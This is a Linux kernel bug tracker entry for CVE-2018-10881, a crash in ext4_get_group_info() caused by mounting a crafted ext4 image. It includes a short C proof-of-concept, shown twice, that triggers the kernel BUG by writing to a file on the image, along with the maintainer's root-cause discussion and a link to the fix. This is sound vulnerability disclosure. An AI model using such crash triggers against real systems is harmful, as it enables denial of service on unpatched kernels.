Bug 200015
Summary: BUG() triggered in ext4_get_group_info() when mounting and operating a crafted ext4 image

| Field | Value | Field | Value |
|---|---|---|---|
| Product | File System | Reporter | Wen Xu (wen.xu) |
| Component | ext4 | Assignee | fs_ext4 (fs_ext4) |
| Status | RESOLVED CODE_FIX | | |
| Severity | normal | CC | tytso, wen.xu |
| Priority | P1 | | |
| Hardware | All | | |
| OS | Linux | | |
| Kernel Version | 4.17 | Subsystem | |
| Regression | No | Bisected commit-id | |

Attachments:
The (compressed) crafted image which causes crash
Simplified image

Description
Wen Xu
2018-06-10 01:18:26 UTC
A simpler POC:
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/falloc.h>
#include <linux/loop.h>
static void activity(char *mpoint) {
    char *foo_bar_baz;
    int err;
    static int buf[8192];
    memset(buf, 0, sizeof(buf));
    err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);
    int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
    if (fd >= 0) {
        write(fd, (char *)buf, 517);
        write(fd, (char *)buf, sizeof(buf));
        close(fd);
    }
    fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
    if (fd >= 0) {
        write(fd, (char *)buf, sizeof(buf));
        close(fd);
    }
}
int main(int argc, char *argv[]) {
    activity(argv[1]);
    return 0;
}

Thanks for the simplified POC. But unfortunately that doesn't really tell me anything new. What I need is a simplified POC *image*.

I can add a simplistic check to see if we get a negative group number in ext4_discard_preallocations(), but that's not the real root cause. And it wouldn't be a complete solution, since we would have to add gazillions of checks anywhere we use s_first_data_block. It's much better if we can check s_first_data_block at mount time (which we do), and then make sure that it can't get corrupted afterwards.

So the real root cause is that somehow the superblock buffer has gotten corrupted. We have a lot of checks to prevent this from happening --- that's what the ext4_data_block_valid() function in fs/ext4/block_validity.c is all about --- but obviously, we're missing a check somewhere. The question is where. If we had a simplified POC image, I could look for the file system corruption that was causing the superblock to get trashed. The problem is that there are so many random corruptions, many of them completely irrelevant to the bug at hand, that this is extremely difficult.
(In reply to Theodore Tso from comment #2)
> Thanks for the simplified POC. But unfortunately that doesn't really tell
> me anything new. What I need is a simplified POC *image*.
>
> I can add a simplistic check to see if we get a negative group number in
> ext4_discard_preallocations(), but that's not the real root cause. And it
> wouldn't be a complete solution, since we would have to add gazillions of
> checks anywhere we use s_first_data_block. It's much better if we can
> check s_first_data_block at mount time (which we do), and then make sure
> that it can't get corrupted afterwards.
>
> So the real root cause is somehow, the superblock buffer has gotten
> corrupted. We have a lot of checks to prevent this from happening ---
> that's what the ext4_data_block_valid() function in fs/ext4/block_validity.c
> is all about --- but obviously, we're missing a check somewhere. The
> question is where. If we had a simplified POC image, I could look to find
> the file system corruption that was causing the superblock to get trashed.
> The problem is that there are so many random corruptions, many of them
> completely irrelevant to the bug at hand, that this is extremely difficult.

Yeah, I know. I will spend some time making a simplified POC image for you :)

Created attachment 276563: Simplified image

Hi Ted,
You can still use this POC:
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/falloc.h>
#include <linux/loop.h>
static void activity(char *mpoint) {
    char *foo_bar_baz;
    int err;
    static int buf[8192];
    memset(buf, 0, sizeof(buf));
    err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);
    int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
    if (fd >= 0) {
        write(fd, (char *)buf, 517);
        write(fd, (char *)buf, sizeof(buf));
        close(fd);
    }
    fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
    if (fd >= 0) {
        write(fd, (char *)buf, sizeof(buf));
        close(fd);
    }
}
int main(int argc, char *argv[]) {
    activity(argv[1]);
    return 0;
}
In my testing, an umount is sometimes required.
Thanks,
Wen

Thanks Wen for your help in tracking down the problem. The fix is here:
http://patchwork.ozlabs.org/patch/929792/

This has been assigned CVE-2018-10881.
Red Hat Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1596828